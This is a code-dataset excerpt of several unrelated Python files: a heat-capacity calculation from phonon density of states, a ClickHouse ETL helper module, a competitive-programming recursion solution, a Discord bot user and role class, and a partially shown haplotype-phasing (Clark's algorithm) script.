None\n\n","repo_name":"John-Boccio/FacialExpressionRecognition","sub_path":"data_loader/CK.py","file_name":"CK.py","file_ext":"py","file_size_in_byte":5156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41103158242","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 16 23:56:51 2022\n\n@author: rlg3\n\nCalculate the C_V at half of the Debye temperature\n\"\"\"\n\nimport pdos_integration as pint\nimport numpy as np\nimport json\nimport pandas as pd\nfrom jarvis.db.figshare import data as jdata\nfrom jarvis.analysis.elastic.tensor import ElasticTensor\nfrom jarvis.core.atoms import Atoms\nfrom jarvis.core.specie import Specie\n\nfrom sklearn.metrics import mean_absolute_error, r2_score\nfrom math import isnan\nfrom math import pi\n\nrun = 'run11'\nlabel = 'target'\n\nhbar = 1.0545718E-34\nkB = 1.38064852E-23\n\n\ndef mass_difference(p):\n elements = p['atoms']['elements']\n mass = []\n for sp in elements:\n mass.append(Specie(sp).atomic_mass)\n mdiff = max(mass) - min(mass)\n return mdiff\n\n\nwith open('../../' + run + '/temp/multi_out_predictions.json') as json_file:\n dos_dict = json.load(json_file)\n\nedos_pdos = jdata(\"edos_pdos\")\ndft_3d = jdata(\"dft_3d\")\n\nnorm_dos_dict = pint.transform_normalized_dos(edos_pdos, dos_dict, dos_label = 'target')\n\nnorm_dos_dict = pint.transform_normalized_dos(edos_pdos, norm_dos_dict, dos_label = 'predictions')\n\njid_list = []\ndebyeT_list = []\nmdiff_list = []\nCp_target = []\nCp_pred = []\n\ngamma_iso_target = []\ngamma_iso_pred = []\n\n'''\nLargest mass difference (heaviest atom - lightest atom)\n'''\n\n\n'''\nSpeed of sound -- might not be so different from Debye T?\n'''\n\nfor i in dos_dict:\n jid = i[\"id\"]\n start = jid.find('JVASP')\n end = jid.find('.vasp')\n jid = jid[start:end]\n jid_list.append(jid)\n target = np.array(i['target'])\n prediction = np.array(i['predictions'])\n freq = np.linspace(0, 1000, len(target))\n match = next(i for i in dft_3d if i[\"jid\"] == jid)\n atoms = Atoms.from_dict(match['atoms'])\n et = ElasticTensor(match['elastic_tensor'])\n debyeT = et.debye_temperature_toberer(atoms)\n debyeT_list.append(debyeT)\n mdiff = mass_difference(match)\n mdiff_list.append(mdiff)\n if not isnan(debyeT):\n Cp_target.append(pint.heat_capacity(freq, target, debyeT / 2))\n Cp_pred.append(pint.heat_capacity(freq, prediction, debyeT / 2))\n else:\n Cp_target.append(pint.heat_capacity(freq, target,300))\n Cp_pred.append(pint.heat_capacity(freq, prediction, 300))\n try:\n gamma_iso_target.append(pint.isotopic_tau(match, freq, target))\n gamma_iso_pred.append(pint.isotopic_tau(match, freq, prediction))\n except:\n gamma_iso_target.append(0)\n gamma_iso_pred.append(0)\n\n\noutput = {'JID' : jid_list, 'Cp Target' : Cp_target, 'Cp Prediction' : Cp_pred,\\\n 'DebyeT' : debyeT_list, 'Mass Difference' : mdiff_list, 'Isotope Gamma Target' : gamma_iso_target,\\\n 'Isotope Gamma Prediction' : gamma_iso_pred}\n\noutput_df = pd.DataFrame(output)\n\noutput_df.to_csv(run + 'Cp_at_half_debyeT.csv')\n\n\n\n\n\n","repo_name":"RamyaGuru/Alignn-thermal-props","sub_path":"cp_at_debyeT.py","file_name":"cp_at_debyeT.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27200167622","text":"# Functions common to all four of the fact table processing scripts.\n# Most of the functionality is in here or at least goes through here.\n# This could likely be reused as a library for other ETL tasks by updating table_info.py and dimension.py to match different ETL tasks\n\n\n# import python libraries\nimport time\nimport MySQLdb\nimport clickhouse_driver\nfrom collections import deque\n\n# import my python modules\nimport dimension\nimport table_info\n\n\n# dimension data structures like {name: dimension_object}\ndicts = {} #TODO rename this\n\n# todo probably better saving these to a file directly. \n# also adding a max error limit to avoid going through the whole dataset doing nothing\n# for error handling, unused.\nerror_rows = []\n# for expectedly skipped rows. currently also unused.\nskipped_rows = []\ndistrict_rows = []\n\n# TODO consider renaming places where dim_dict is to just dimension and similar (this file's object dicts)\n\n# mostly for backwards compatibility purposes atm\ndef _new_dim_dict(name):\n \"\"\"\n Create a dimension object and add it to this module's dimension dictionary under the name provided.\n If name is 'time', creates TimeDimension, if 'location' LocationDimension, otherwise SimpleDimension.\n\n Raises ValueError is a dimension with this name already exists in the dictionary.\n \"\"\"\n\n # todo consider checking against table_info.ALLOWED_TABLES before creating\n\n if name in dicts:\n raise ValueError(f'Dict with this name already exists: {name}')\n if name == 'time':\n dicts[name] = dimension.TimeDimension()\n elif name == 'location':\n dicts[name] = dimension.LocationDimension()\n else:\n dicts[name] = dimension.SimpleDimension()\n\n\n# consider combining with _new_dim_dict into one\ndef _ensure_dim_dict(name):\n \"\"\"Calls _new_dim_dict if a dimension with this name does not exist already.\"\"\"\n if name not in dicts:\n _new_dim_dict(name)\n\n# consider stopping supporting this functionality, it's not even that important\ndef _unwrap_wrap_args(*args):\n \"\"\"Turns arguments like ('a', ['b', 'c'], 'd') into list ['a', 'b', 'c', 'd'].\"\"\"\n out = []\n for arg in args:\n if type(arg) == list or type(arg) == tuple:\n for element in arg:\n out.append(element)\n else:\n out.append(arg)\n return out\n\ndef ensure_dim_dicts(*dimension_names):\n \"\"\"\n Creates dimension objects if ones with this name do not exist yet.\n Expected names of dimensions are in table_info.ALLOWED_TABLES.\n \"\"\"\n \n # in retrospect, accepting either a list or a *args instead of just one of them is a weird way to do things.\n dims_list = _unwrap_wrap_args(dimension_names)\n for dim in dims_list:\n _ensure_dim_dict(dim)\n\n\ndef split_line(line):\n \"\"\"Remove trailing whitespace and split on every comma\"\"\"\n return line.rstrip().split('|')\n\n\ndef create_db_table(table_name, dbcon, drop_if_exists = True):\n \"\"\"Create a table in the database using table_info.create_string[table_name].\"\"\"\n c = dbcon.cursor()\n if (drop_if_exists):\n # maybe be more carfeul with dropping in production\n # also maybe escape\n c.execute(f'DROP TABLE IF EXISTS {table_name}')\n # c.execute('DROP TABLE IF EXISTS %s', table_name)\n c.execute(table_info.create_strings[table_name])\n\n\ndef __raise_not_numeric(row_cell, row):\n raise ValueError('All elements in the fact table must be numerical to prevent SQL injection attacks.' +\n f'Instead found: element {row_cell} of type {type(row_cell)} in row {row}')\n\ndef _row_cell_to_numbers(row_cell, row = None):\n\n if(type(row_cell) == int or type(row_cell) == float):\n return row_cell\n else:\n # raise an exception if not a number but chceck numeric strings\n if (type(row_cell) == str):\n try:\n # throws a ValueError if string not convertible to int\n row_cell = int(row_cell)\n return row_cell\n except ValueError:\n try:\n # throw a ValueError if string not convertible to float\n row_cell = float(row_cell)\n return row_cell\n except ValueError:\n __raise_not_numeric(row_cell, row)\n else:\n __raise_not_numeric(row_cell, row)\n\ndef _raise_if_not_int_float(list_of_rows):\n # out = []\n for i,row in enumerate(list_of_rows):\n list_of_rows[i] = [_row_cell_to_numbers(row_cell) for row_cell in row]\n # print(row)\n # print(list_of_rows[i])\n # out.append(row)\n # return out\n\ndef save_batch(batch, dbcon, table_name):\n \"\"\"\n Save a batch of fact table rows into the database.\n\n CAREFUL: MAY be susceptible to SQL injection attacks. \n Does not use existing library functions to escape any characters but only accepts int or float.\n So should be safe but do procees with caution.\n \"\"\"\n\n values = list(batch)\n\n # prepare the headers part of the SQL query\n headers = table_info.headers_dict[table_name]\n headers_str = '('+ ','.join(headers) + ')'\n\n sql_base = f\"INSERT INTO {table_name} {headers_str} VALUES \"\n\n # raise an Exception if anything of type other than (float, int) comes in\n # be very careful removing the following line, will need to escape string if anything other than numbers comes in.\n # print(1)\n # values = \n _raise_if_not_int_float(values)\n # print(2)\n # print(values[:10])\n dbcon.cursor().execute(sql_base, values)\n # print(f'saved to ch')\n\n # each row in values is a tuple so str(v) is (e1, e2, e3, ...) already, and just put commas in between each\n # values_str = ','.join([str(v) for v in values])\n # bigsql = sql_base + values_str\n # if values_str == \"\":\n # raise Exception(\"batch was empty in save_batch\")\n # \n # dbcon.cursor().execute(bigsql)\n # dbcon.commit()\n\ndef save_batch_timed(*args):\n \"\"\"Call save_batch and time how long it took\"\"\"\n start_time = time.time()\n save_batch(*args)\n end_time = time.time()\n return end_time - start_time\n\n\n#TODO comments and better names\n\ndef _read_filestream_as_split_lines(file):\n for line in file:\n yield split_line(line)\n\ndef read_file_as_split_lines(filepath, skip_headers = True):\n with open(filepath) as file:\n if skip_headers:\n _ = next(file)\n \n yield from _read_filestream_as_split_lines(file)\n\ndef batch_process_threaded_from_file(path, skip_headers=True, **kwargs):\n batch_process_threaded_from_generator(read_file_as_split_lines(path, skip_headers), **kwargs)\n\ndef does_table_exist(table_name, dbcon):\n c = dbcon.cursor()\n c.execute(\"show tables like %s\", (table_name,))\n res = c.fetchone()\n res = res[0]\n return True if res == table_name else False\n\ndef ensure_table(table_name, dbcon, if_exists):\n if if_exists == 'replace':\n return create_db_table(table_name, dbcon)\n elif if_exists == 'append':\n if not does_table_exist(table_name, dbcon):\n # only create if it doesn't exist\n create_db_table(table_name, dbcon)\n elif if_exists == 'fail':\n if does_table_exist(table_name, dbcon):\n raise ValueError(f'Table {table_name} already exists')\n\ndef save_errors(error_rows):\n with open('error_file.txt', 'a') as file:\n # file.write('\\n')\n file.write(str([f'{time.time()}: {str(e)}\\n' for e in error_rows]))\n\ndef clear_error_file():\n with open('error_file.txt', 'w') as file:\n file.write('')\n\nimport concurrent.futures\ndef batch_process_threaded_from_generator(row_generator, row_func, fact_table_name, dbcon, if_exists='fail', **row_func_kwargs):\n start_time = time.time()\n maxlen = 4000 # 16s. 1000 21s, 10000 17s\n error_rows= []\n clear_error_file()\n batch = deque([], maxlen=maxlen)\n # also consider multiprocessing Queue - one shared queue between threads, and just save as it fills up (or like a queue of batches even)\n\n # connect if dbcon is null\n connected_here = False\n if not dbcon:\n dbcon = connect_to_db()\n connected_here = True\n\n ensure_table(fact_table_name, dbcon, if_exists)\n with concurrent.futures.ThreadPoolExecutor() as executor:\n latest_future = None\n total_insert_time = 0\n\n for row in row_generator:\n # also option of using csv.reader - slower but handles quotation marks around cells\n\n # maybe make fact_line come from a generator instead, to separate creating and saving\n try:\n fact_line = row_func(row, **row_func_kwargs)\n # except Exception as e:\n # error_rows.append((row, e))\n\n batch.append(fact_line)\n except dimension.DistrictException as de:\n district_rows.append(row)\n continue # skip the rest of the execution for this line here\n except KeyboardInterrupt as ke:\n save_errors(error_rows[:100])\n raise ke\n except Exception as e:\n error_rows.append(tuple(e, row))\n if (len(error_rows)>100):\n # too many errors\n raise e\n\n if len(batch) == maxlen:\n \n try:\n if latest_future:\n # wait up to 2 seconds for the last SQL INSERT to finish (or raise an Exception)\n time_taken = latest_future.result(3)\n total_insert_time += time_taken\n\n latest_future = executor.submit(save_batch_timed, batch, dbcon, fact_table_name)\n batch = deque([], maxlen=maxlen) # empty the queue here\n # except MySQLdb.DataError as mde:\n # error_rows.append((mde, batch))\n # except TimeoutError\n except KeyboardInterrupt as ke:\n raise ke\n except Exception as e:\n error_rows.append((e, batch))\n if (len(error_rows)>100):\n # too many errors\n raise e\n \n if error_rows and len(error_rows) >=1000:\n save_errors(error_rows)\n error_rows = []\n try:\n \n # wait for last save task to finish\n if latest_future:\n time_taken = latest_future.result(2)\n total_insert_time += time_taken\n\n # save items left in the queue after finished reading the file (e.g. if there are 9500 rows and batches are size 1000, 500 left at the end)\n if len(batch) != 0:\n latest_future = executor.submit(save_batch_timed, batch, dbcon, fact_table_name)\n time_taken = latest_future.result(2)\n total_insert_time += time_taken\n except Exception as e:\n error_rows.append(e, batch)\n\n if error_rows:\n save_errors(error_rows)\n\n # close connection if connected here\n if (connected_here):\n dbcon.close()\n end_time = time.time()\n print(f'read handle and write took {end_time - start_time} seconds to table {fact_table_name}.')\n print(f'Inserting into fact table took a total of {total_insert_time} seconds')\n pass \n\n\n# TODO rename this\n# TODO refactor needed, there is a lot of deeply nested function calls where each don't really add anything \ndef batch_process(path, row_func, fact_table_name, dbcon=None, **kwargs):\n \"\"\"Process file at path. See batch_process_threaded\"\"\"\n batch_process_threaded_from_file(path=path, skip_headers=True, row_func=row_func, fact_table_name=fact_table_name, dbcon=dbcon, if_exists='replace', **kwargs)\n pass\n\n\ndef save_dim(name, dbcon = None):\n \"\"\"Wrapper for Dimension.to_sql, also creates connection if dbcon null\"\"\"\n db_connected_here = False\n if not dbcon:\n dbcon = connect_to_db()\n db_connected_here = True\n\n dicts[name].to_sql(name, dbcon)\n if db_connected_here:\n dbcon.commit()\n dbcon.close()\n\ndef save_dims():\n \"\"\"Save all the created dimensions into SQL database\"\"\"\n dbcon = connect_to_db()\n for name in dicts.keys():\n save_dim(name, dbcon)\n dbcon.commit()\n dbcon.close()\n\nclass ClickhouseCursorClient:\n def __init__(self, client):\n self.client = client\n def cursor(self):\n return self\n def commit(self):\n pass\n def close(self):\n self.client.disconnect()\n def execute(self, *args, **kwargs):\n return self.client.execute(*args, **kwargs)\n def executemany(self, sql, values):\n sqlnoval = sql.split('%')[0][:-1]\n return self.client.execute(sqlnoval, values)\n print(sql)\n print(values)\n\ndbpassword = None\n\ndef getDbPassword():\n if dbpassword:\n return dbpassword\n else:\n dbpassword = input(\"Please enter the database password \")\n return dbpassword\n# TODO make this adjustable\ndef connect_to_db():# -> MySQLdb.Connection:\n \"\"\"Get MySQLdb connection to default database.\"\"\"\n db = clickhouse_driver.Client(host='localhost', password = dbpassword, database='sgov')\n db = ClickhouseCursorClient(db)\n # db = MySQLdb.connect(host='localhost:9004',user='temp_user', passwd = 'password', database='sgov')\n # import psycopg2\n # db = psycopg2.connect(database='sgov_mini', user='temp_user', password='password')\n # c = db.cursor()\n return db\n\ndef get_sqlalchemy_con():\n \"\"\"Get SQLAlchemy engine for the database\"\"\"\n import sqlalchemy\n return sqlalchemy.create_engine('clickhouse://', creator= lambda :connect_to_db().client)\n # return sqlalchemy.create_engine('mysql://', creator=connect_to_db)\n\ndef get_sql_alchemy_con_for_read():\n import sqlalchemy\n return sqlalchemy.create_engine(f'clickhouse+native://default:{dbpassword}@localhost:8123')\n return sqlalchemy.create_engine('clickhouse://', creator= lambda :connect_to_db())\n\n# A lot of wrapper functions which are mostly here for historic purposes. But may be good to keep anyway in case changes are wanted.\n#TODO change explicit args to *args or **kwargs\n\ndef add_to_dict_if_not_in(dict_name, key, values: list):\n \"\"\"Wrapper function for dimension.add_if_not_in. Takes in name of dim as stored in dicts here\"\"\"\n return dicts[dict_name].add_if_not_in(key, values)\n\n \ndef handle_one_dim(dict_name, row, row_index):\n \"\"\"Wrapper for SimpleDimension.add_row. Takes in name of dim as stored in dicts here\"\"\"\n return dicts[dict_name].add_row(row, row_index)\n\ndef handle_time(row, index = 0):\n \"\"\"Wrapper for TimeDimension.add_row. Takes in name of dim as stored in dicts here\"\"\"\n return dicts['time'].add_row(row, index)\n\ndef handle_loc(row, loc_level_idx = 4, loc_idx = 5, smallest_area_name = 'POSTCODE_SECTOR', skip_bigger_area_rows=False):\n \"\"\"Wrapper for LocationDimension.add_row. Takes in name of dim as stored in dicts here\"\"\"\n return dicts['location'].add_row(row, loc_level_idx, loc_idx, smallest_area_name, skip_bigger_area_rows=skip_bigger_area_rows)\n\n# consider removing\ndef postcode_sector_to_loc_list(sector: str):\n \"\"\"Wrapper for LocationDimension.postcode_sector_to_loc_list.\"\"\"\n return dimension.LocationDimension.postcode_sector_to_loc_list(sector)\n\ndef get_headers(dict_name):\n \"\"\"Get the headers of a given dimension\"\"\"\n return dicts[dict_name].headers\n\n\n","repo_name":"TransportScotland/payment-card-spend-data-processing","sub_path":"etl_legacy/shared_funcs.py","file_name":"shared_funcs.py","file_ext":"py","file_size_in_byte":15461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30421504487","text":"import copy\n\nn = int(input())\nk = int(input())\n\nlst = []\n\nfor i in range(n):\n lst.append((input()))\n\nanswer = \"\"\n\nresultt = []\ndef finding(t):\n global answer\n global k\n if len(t) == k:\n if answer not in resultt:\n result = copy.deepcopy(answer)\n resultt.append(result)\n \n else:\n for i in range(len(lst)):\n if i in t:\n continue\n else:\n t.append(i)\n answer += lst[i]\n r = len(answer)\n l = len(lst[i])\n # print(t)\n finding(t)\n t.pop()\n answer = answer[:r-l]\n \n\nfinding([])\n\nprint(len(resultt))\n\n\n","repo_name":"JunHyungJang/codingtest","sub_path":"Baekjoon/recursion/5568.py","file_name":"5568.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21651709167","text":"import json, discord\nfrom cDatabase.DB_Users import DB_Users\nfrom cDatabase.KV_Database import KV_Database\nfrom helper.CF_API import CF_API\n\nconfig = json.load(open('config.json', 'r'))\ndatabase_users = DB_Users(\"db_users\")\ncf_ranking = KV_Database('CodeForces_Ranking')\ncf_api = CF_API()\n\n# ------------------------------------ { User } ------------------------------------ # \nclass User:\n id = None\n handle = None\n client = None\n\n # ------------------ [ __init__() ] ------------------ # \n # Initializes id and handle based on given parameters\n def __init__(self, id = '', handle = '', client = None):\n if (id != '' and handle != ''):\n self.id, self.handle = str(id), handle\n elif (id != ''):\n self.id = str(id)\n self.handle = database_users.find_handle(self.id)\n elif (handle != ''): \n self.id = str(database_users.find_id(self.handle))\n self.handle = handle\n self.client = client\n\n # ------------------ [ is_admin() ] ------------------ # \n # Returns true if user is Ahmad, Khaled, Miguel, or MB, otherwise false\n def is_admin(self):\n if self.id in [\n '763289145288032268',\n '763319277540605972',\n '763345404674048020',\n '402887362046066698']: return True\n return False\n\n # ------------------ [ tag() ] ------------------ # \n # Tags the user that called the command\n def tag(self):\n return '<@!' + str(self.id) + '>'\n\n # ------------------ [ is_taken_id() ] ------------------ # \n # Checks if the ID is already registered\n def is_taken_id(self):\n if (self.id == None): return True\n return database_users.is_taken_id(self)\n\n # ------------------ [ is_taken_handle() ] ------------------ # \n # Checks if an ID is already registered to another handle\n def is_taken_handle(self):\n if (self.handle == None): return True\n return database_users.is_taken_handle(self)\n\n # ------------------ [ is_registered() ] ------------------ # \n # Checks if user is in the database\n def is_registered(self):\n if (self.id == None or self.handle == None): return False\n return database_users.is_registered(self)\n\n \n # ------------------ [ register() ] ------------------ # \n # Registers the user to the bot's database\n def register(self):\n if (self.id == None or self.handle == None): return False\n return database_users.register(self)\n\n \n # ------------------ [ change_handle() ] ------------------ # \n # Changes the user's handle in the database\n def change_handle(self, new_handle):\n if (self.handle == new_handle): return False\n if (not self.is_registered()): return False\n self.handle = new_handle\n return database_users.change_handle(self, new_handle)\n\n \n # ------------------ [ delete() ] ------------------ # \n # Deletes the user from the database\n def delete(self):\n # Remove from contests\n if (self.id == None or self.handle == None): return False\n return database_users.remove_user(self)\n\n # ------------------ [ __str__() ] ------------------ # \n # Returns a string representation of the user with their id and handle\n def __str__(self):\n return \"User: \" + str(self.id) + ' ' + str(self.handle)\n\n # ------------------ [ add_role() ] ------------------ # \n # Adds a role to the to the user in the Discord server\n async def add_role(self, _role):\n guild = self.client.get_guild(config['guild_id'])\n member = await guild.fetch_member(int(self.id))\n role = discord.utils.get(member.guild.roles, name = _role)\n await member.add_roles(role)\n\n \n # ------------------ [ get_roles() ] ------------------ # \n # return a list of all Discord roles of the user\n async def get_roles(self):\n guild = self.client.get_guild(config['guild_id'])\n member = await guild.fetch_member(int(self.id))\n return member.roles\n\n \n # ------------------ [ has_role() ] ------------------ # \n # Returns true if the user is a member of the specified role\n async def has_role(self, _role):\n guild = self.client.get_guild(config['guild_id'])\n member = await guild.fetch_member(int(self.id))\n role = discord.utils.get(member.guild.roles, name = _role)\n return role in member.roles\n\n # ------------------ [ remove_role() ] ------------------ # \n # Removes the role from the specified member\n async def remove_role(self, _role):\n guild = self.client.get_guild(config['guild_id'])\n member = await guild.fetch_member(int(self.id))\n role = discord.utils.get(member.guild.roles, name = _role)\n await member.remove_roles(role)\n\n # ------------------ [ get_different_roles() ] ------------------ # \n # returns a list of all the CodeForces related roles that are not\n # up-to-date with the user's current rank on CodeForces\n async def get_different_roles(self, role):\n roles = await self.get_roles()\n x = cf_ranking.get(role)\n lst = []\n \n for r in roles:\n if r.name in cf_ranking.keys() and cf_ranking.get(r.name) != x:\n lst.append(r.name)\n\n return lst\n\n async def update_roles(self):\n rank = cf_api.user_rank(self)\n lst = await self.get_different_roles(rank)\n for r in lst: await self.remove_role(r)\n await self.add_role(rank)\n","repo_name":"KhaledChehabeddine/aub_cp_discord_bot","sub_path":"helper/User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38196971006","text":"import numpy as np\nimport csv\nimport pdb\nimport itertools as it\nfrom progress.bar import Bar\n\n# Load data as 2d int array\ndef load(file_name):\n\tdata = []\n\twith open(file_name, newline=\"\\n\") as csvfile:\n\t\treader = csv.reader(csvfile, delimiter=' ')\n\t\tfor row in reader:\n\t\t\tdata.append([int(val) for val in row])\n\treturn data\n\n# Phase haplotypes from unambiguous genotypes\n# TODO: assign 0 or 1 based on observed frequency\ndef gen_2_haps(genotype):\n\thap1, hap2 = [], []\n\tfor gen in genotype:\n\t\tif gen == 0:\n\t\t\thap1.append(0)\n\t\t\thap2.append(0)\n\t\tif gen == 2:\n\t\t\thap1.append(1)\n\t\t\thap2.append(1)\n\t\tif gen == 1:\n\t\t\thap1.append(0)\n\t\t\thap2.append(1) \n\treturn hap1, hap2\n\n# Return 2d array of all known haplotypes\ndef get_known_haps(haplotypes,window_len):\n\tnum_snps = len(haplotypes)\n\tnum_haps = len(haplotypes[0])\n\tknown_haps = []\n\tfor i in range(num_haps):\n\t\thaplotype = [row[i] for row in haplotypes]\n\t\tfor j in range(0, num_snps, window_len):\n\t\t\thaplotype_segment = haplotype[j:j+window_len]\n\t\t\tif haplotype_segment.count(-1) == 0 and haplotype_segment not in known_haps:\n\t\t\t\tknown_haps.append(haplotype_segment)\n\treturn known_haps\n\n# Phase all unambiguous haplotypes of a given length\ndef fill_known_haps(data,window_len):\n\tnum_snps = len(data)\n\tnum_indiv = len(data[0])\n\t#print(\"num snps, indv = {} {}\".format(num_snps,num_indiv))\n\thaplotypes = np.zeros((num_snps,2*num_indiv),dtype=np.int)\n\thaplotypes.fill(-1)\n\tknown_haps = []\n\tfor i in range(num_indiv):\n\t\tgenotype = [row[i] for row in data]\n\t\tfor j in range(0,num_snps,window_len):\n\t\t\tgenotype_segment = genotype[j:j+window_len]\n\t\t\tif genotype_segment.count(1) < 2:\n\t\t\t\thap1, hap2 = gen_2_haps(genotype_segment)\n\t\t\t\tif hap1 not in known_haps:\n\t\t\t\t\tknown_haps.append(hap1)\n\t\t\t\tif hap2 not in known_haps:\n\t\t\t\t\tknown_haps.append(hap2)\n\t\t\t\thap1_np = np.array(hap1)\n\t\t\t\thap2_np = np.array(hap2)\n\t\t\t\tfor k in range(window_len):\n\t\t\t\t\thaplotypes[j+k][2*i] = hap1[k]\n\t\t\t\t\thaplotypes[j+k][2*i+1] = hap2[k]\n\treturn haplotypes, known_haps\n\n# Helper function for adding two haplotypes\ndef add_haplotypes(hap1, hap2):\n add_result = [hap1[i] +hap2[i] for i in range(len(hap1))]\n return add_result\n\n# Helper function for subtracting two haplotypes\ndef subtract_genhap(genotype,haplotype):\n\tsub_result = [genotype[i] - haplotype[i] for i in range(len(genotype))]\n\treturn sub_result\n\n# Makes a dictionary of all possible pair-wise combinations of known haplotypes\n# TODO: Remove incompatible haplotypes from known set before calling func in Clark's\n#\t\tto reduce # of comparisons.\ndef make_hap_map(known_set):\n hap_map = {}\n all_combos = list(it.combinations(known_set, 2))\n for pair in all_combos:\n hap_map[str(add_haplotypes(pair[0], pair[1]))] = [pair[0], pair[1]]\n return hap_map\n\n# Infer haplotype 2 if genotype and haplotype 1 make it unambiguous \ndef get_hap2_from_known_hap1(genotype, known_set):\n def validHap(haplotype):\n valid = True\n for element in haplotype:\n if element is not 0 and element is not 1:\n valid = False\n return valid\n for h1 in known_set:\n h2 = subtract_genhap(genotype, h1)\n if validHap(h2):\n return h1, h2\n return [],[]\n\n# Guess rest of haplotypes that Clark's algorithm couldn't phase\n# TODO: Incorporate frequency so that we don't randomly guess\ndef guess_rest(data,haplotypes):\n\tnum_snps = len(data)\n\tnum_indiv = len(data[0])\n\tfor i in range(num_indiv):\n\t\tfor j in range(num_snps):\n\t\t\tif haplotypes[j][2*i] == -1 and haplotypes[j][2*i+1] == -1:\n\t\t\t\tif data[j][i] == 0:\n\t\t\t\t\thaplotypes[j][2*i], haplotypes[j][2*i+1] = 0,0\n\t\t\t\telif data[j][i] == 1:\n\t\t\t\t\thaplotypes[j][2*i], haplotypes[j][2*i+1] = 0,1\n\t\t\t\telif data[j][i] == 2:\n\t\t\t\t\thaplotypes[j][2*i], haplotypes[j][2*i+1] = 1,1\n\t\t\telif haplotypes[j][2*i] == -1:\n\t\t\t\tif haplotypes[j][2*i+1] == 0:\n\t\t\t\t\tif data[j][i] == 0:\n\t\t\t\t\t\thaplotypes[j][2*i] = 0\n\t\t\t\t\telif data[j][i] == 1:\n\t\t\t\t\t\thaplotypes[j][2*i] = 1\n\t\t\t\t\telif data[j][i] == 2:\n\t\t\t\t\t\t#should never be called\n\t\t\t\t\t\tprint(\"SOMETHINGS WRONG\")\n\t\t\t\t\t\thaplotypes[j][2*i] = 1\n\t\t\t\telif haplotypes[j][2*i+1] == 1:\n\t\t\t\t\tif data[j][i] == 0:\n\t\t\t\t\t\t#should never be called\n\t\t\t\t\t\tprint(\"SOMETHINGS WRONG\")\n\t\t\t\t\t\thaplotypes[j][2*i] = 0\n\t\t\t\t\telif data[j][i] == 1:\n\t\t\t\t\t\thaplotypes[j][2*i] = 0\n\t\t\t\t\telif data[j][i] == 2:\n\t\t\t\t\t\thaplotypes[j][2*i] = 1\n\t\t\telif haplotypes[j][2*i+1] == -1:\n\t\t\t\tif haplotypes[j][2*i] == 0:\n\t\t\t\t\tif data[j][i] == 0:\n\t\t\t\t\t\thaplotypes[j][2*i+1] = 0\n\t\t\t\t\telif data[j][i] == 1:\n\t\t\t\t\t\thaplotypes[j][2*i+1] = 1\n\t\t\t\t\telif data[j][i] == 2:\n\t\t\t\t\t\t#should never be called\n\t\t\t\t\t\tprint(\"SOMETHINGS WRONG\")\n\t\t\t\t\t\thaplotypes[j][2*i+1] = 1\n\t\t\t\telif haplotypes[j][2*i] == 1:\n\t\t\t\t\tif data[j][i] == 0:\n\t\t\t\t\t\t#should never be called\n\t\t\t\t\t\tprint(\"SOMETHINGS WRONG\")\n\t\t\t\t\t\thaplotypes[j][2*i+1] = 0\n\t\t\t\t\telif data[j][i] == 1:\n\t\t\t\t\t\thaplotypes[j][2*i+1] = 0\n\t\t\t\t\telif data[j][i] == 2:\n\t\t\t\t\t\thaplotypes[j][2*i+1] = 1\n\treturn haplotypes\n\n# Main algorithm to phase genotype data\ndef clarks(data, window_len):\n\tnum_snps = len(data)\n\tnum_indiv = len(data[0])\n\thaplotypes, known_haps = fill_known_haps(data,window_len)\n\n\thap_map = make_hap_map(known_haps)\n\tfor num_iter in range(10):\n\t\tcurr_known_haps_size = len(known_haps)\n\t\t#bar_i = Bar('Phasing Individuals...', max=num_indiv)\t\t\n\t\tfor i in range(num_indiv):\n\t\t\tgenotype = [row[i] for row in data]\n\t\t\t#bar_j = Bar('SNPs', max=(int)(num_snps/window_len))\n\t\t\tfor j in range(0,num_snps,window_len):\n\t\t\t\t#print(\"Iteration {}, Indiv {}, Window range [{},{}]\".format(num_iter,i,j,j+window_len))\n\t\t\t\tgenotype_segment = genotype[j:j+window_len] \n\t\t\t\tseg_key = str(genotype_segment)\n\n\t\t\t\tif seg_key in hap_map:\n\t\t\t\t\thap1, hap2 = hap_map[seg_key]\n\t\t\t\t\thap1_np = np.array(hap1)\n\t\t\t\t\thap2_np = np.array(hap2)\n\t\t\t\t\tfor k in range(window_len):\n\t\t\t\t\t\thaplotypes[j+k][2*i] = hap1[k]\n\t\t\t\t\t\thaplotypes[j+k][2*i+1] = hap2[k]\n\t\t\t\telse:\n\t\t\t\t\thap1, hap2 = get_hap2_from_known_hap1(genotype_segment,known_haps)\n\t\t\t\t\tif len(hap1) > 0 and len(hap2) > 0:\n\t\t\t\t\t\thap1_np = np.array(hap1)\n\t\t\t\t\t\thap2_np = np.array(hap2)\n\t\t\t\t\t\tfor k in range(window_len):\n\t\t\t\t\t\t\thaplotypes[j+k][2*i] = hap1[k]\n\t\t\t\t\t\t\thaplotypes[j+k][2*i+1] = hap2[k]\n\t\t\t\t\t\tknown_haps.append(hap2)\n\t\t\t\t\t\thap_map = make_hap_map(known_haps)\n\t\t\t\t#bar_j.next()\n\t\t\t#bar_j.finish()\n\t\t\t#bar_i.next()\n\t\t#decrease window size if we didn't add any to our known set\n\t\tif len(known_haps) - curr_known_haps_size == 0:\n\t\t\tif window_len == 30:\n\t\t\t\twindow_len = 20\n\t\t\telif window_len == 20:\n\t\t\t\twindow_len = 15\n\t\t\telif window_len == 15:\n\t\t\t\twindow_len = 10\n\t\t\telif window_len == 10:\n\t\t\t# \twindow_len = 10\n\t\t\t# elif window_len == 10:\n\t\t\t# \twindow_len = 8\n\t\t\t# elif window_len == 8:\n\t\t\t# \twindow_len = 6\n\t\t\t# elif window_len == 6:\n\t\t\t\tbreak\n\t\t\tknown_haps = get_known_haps(haplotypes,window_len)\n\t\t#bar_i.finish()\n\n\t#print(\"# of -1 before guess =\", np.count_nonzero(haplotypes==-1))\n\tfinal_haplotypes = 